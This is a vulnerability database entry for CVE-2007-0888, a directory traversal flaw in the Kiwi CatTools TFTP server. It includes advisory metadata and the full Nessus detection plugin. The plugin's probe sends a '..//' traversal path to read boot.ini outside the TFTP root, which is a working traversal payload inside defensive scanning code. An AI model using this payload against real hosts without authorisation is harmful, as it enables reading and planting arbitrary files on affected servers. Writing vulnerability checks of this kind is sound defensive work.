Vulnerabilities > CVE-2007-0888 - Directory Traversal vulnerability in Kiwi CatTools TFTP

CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
kiwi-enterprises
critical
nessus
exploit available

Summary

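Directory traversal vulnerability in the TFTP server in Kiwi CatTools before 3.2.0 beta allows remote attackers to read arbitrary files, and upload files to arbitrary locations, via ..// (dot dot) sequences in the pathname argument to a TFTP (1) GET or (2) PUT command. This vulnerability is addressed in the following product update: Kiwi Enterprises, Kiwi CatTools, 3.2.0 Beta. Note that the Exploit-DB and Nessus entries on this page state the affected range differently (3.2.8 and earlier, fixed in 3.2.9), so confirm the fixed version against the vendor advisory before relying on a version check.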

Vulnerable Configurations

Part Description Count
Application
Kiwi_Enterprises
1

Exploit-Db

description: Kiwi CatTools TFTP <= 3.2.8 Remote Path Traversal Vulnerability. CVE-2007-0888. Remote exploit for windows platform
id: EDB-ID:3380
last seen: 2016-01-31
modified: 2007-02-27
published: 2007-02-27
reporter: Sergey Gordeychik
source: https://www.exploit-db.com/download/3380/
title: Kiwi CatTools TFTP <= 3.2.8 - Remote Path Traversal Vulnerability

Nessus

NASL family: Misc.
NASL id: KIWI_CATTOOLS_TFTPD_DIR_TRAVERSAL.NASL
description: The remote host appears to be running Kiwi CatTools, a freeware application for device configuration management. The TFTP server included with the version of Kiwi CatTools installed on the remote host fails to sanitize filenames of directory traversal sequences. An attacker can exploit this issue to get or put arbitrary files on the affected host subject to the privileges of the user id under which the server operates, LOCAL SYSTEM by default.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 24747
published: 2007-03-01
reporter: This script is Copyright (C) 2007-2018 Ferdy Riphagen
source: https://www.tenable.com/plugins/nessus/24747
title: Kiwi CatTools < 3.2.9 TFTP Server Traversal Arbitrary File Manipulation
code
#
# Script Written By Ferdy Riphagen 
# Script distributed under the GNU GPLv2 License.
#

# Changes by Tenable: 
# - re-did the description, raised the risk (1/23/09)
# - Revised plugin title, family change (9/5/09)

include("compat.inc");

# Plugin registration. When the script is loaded with `description` set, only
# this block runs: it records identifiers, report text, scoring and scheduling
# metadata, then exits before any network traffic is sent.
if (description) {
 # Identifiers that tie this check to the advisory it covers.
 script_id(24747); 
 script_version("1.18");
 script_cve_id("CVE-2007-0888");
 script_bugtraq_id(22490);

 script_name(english:"Kiwi CatTools < 3.2.9 TFTP Server Traversal Arbitrary File Manipulation");

 # Text shown in the finding: one-line synopsis, full description, references
 # and the remediation (upgrade to 3.2.9 or later).
 script_set_attribute(attribute:"synopsis", value:
"The remote TFTP server is affected by a directory traversal
vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running Kiwi CatTools, a freeware
application for device configuration management. 

The TFTP server included with the version of Kiwi CatTools installed
on the remote host fails to sanitize filenames of directory traversal
sequences.  An attacker can exploit this issue to get or put arbitrary
files on the affected host subject to the privileges of the user id
under which the server operates, LOCAL SYSTEM by default." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/459500/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"http://www.kiwisyslog.com/kb/idx/5/178/article/" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Kiwi CatTools version 3.2.9 or later." );
  # CVSS v2 base vector: network reachable, low complexity, no authentication,
  # complete confidentiality/integrity/availability impact. That rating is
  # consistent with the description's statement that the server runs as
  # LOCAL SYSTEM by default.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  # CVSS v2 temporal vector: proof-of-concept exploit code exists (E:POC), an
  # official fix is available (RL:OF) and the report is confirmed (RC:C).
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploithub_sku", value:"EH-13-903");
  script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/03/01");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/09");
 script_cvs_date("Date: 2018/11/15 20:50:23");
 # "remote" plus "exploited_by_nessus": the finding comes from a live request
 # to the TFTP service (the script body reads a file through the traversal),
 # not from a banner or an installed-version comparison.
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_summary(english:"Try to grab a file outside the tftp root");
 # Registered as an active check (ACT_ATTACK), matching the summary above.
 # NOTE(review): whether this category runs under a given scan policy depends
 # on the scanner configuration - confirm before scanning production hosts.
 script_category(ACT_ATTACK);
 script_family(english:"Misc.");
 script_copyright(english:"This script is Copyright (C) 2007-2018 Ferdy Riphagen");
 # Scheduling: declared dependencies are the TFTP detection and TFTP backdoor
 # plugins; the check requires a TFTP service to have been recorded in the KB.
 script_dependencies("tftpd_detect.nasl", "tftpd_backdoor.nasl");
 script_require_keys("Services/udp/tftp");
 # Hosts already flagged with the 'tftp/backdoor' key are excluded here; the
 # script body additionally checks the per-port key 'tftp/<port>/backdoor'.
 script_exclude_keys('tftp/backdoor');	# Not wise but quicker
 exit(0);
}

include("tftp.inc");

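# Active check for the CatTools TFTP directory traversal: request boot.ini
# through a "..//" path and report the host only when the reply is
# recognisably that file.

# Use the TFTP port recorded in the KB, falling back to the standard port 69
# when no entry exists.
port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;
# Skip ports already flagged as a TFTP backdoor, so that a backdoor is not
# reported a second time as this vulnerability.
if (get_kb_item('tftp/'+port+'/backdoor')) exit(0);

# Single read-only probe: five "..//" components followed by boot.ini.
# NOTE(review): the probe assumes the TFTP root lies at most five directories
# below the root of the drive that holds boot.ini, and that boot.ini exists at
# all (newer Windows releases no longer ship one). No reply therefore means
# "not confirmed", not "patched" - verify the installed version as well.
get = tftp_get(port:port, path:"z//..//..//..//..//..//boot.ini");
if (isnull(get)) exit(0);
# In case the backdoor was missed by tftpd_backdoor.nasl (UDP is not reliable)
tftp_ms_backdoor(file: 'boot.ini', data: get, port: port);

# Only boot.ini is requested, so only boot.ini section headers are accepted as
# evidence. The earlier list also matched generic words such as "mode",
# "export", "ECHO" and "SET ", plus win.ini-style section names; any of those
# can occur in unrelated data returned by a TFTP server and would have raised
# a false critical finding whose report claims to show boot.ini.
if (
    ("[boot loader]" >< get) ||
    ("[operating systems]" >< get)
)
{
    # The retrieved contents are attached so the reader can verify the finding.
    report = 
"Here are the contents of the file '\boot.ini' that Nessus
was able to read from the remote host :
" + get;
    security_hole(port:port, protocol:"udp", extra:report);
}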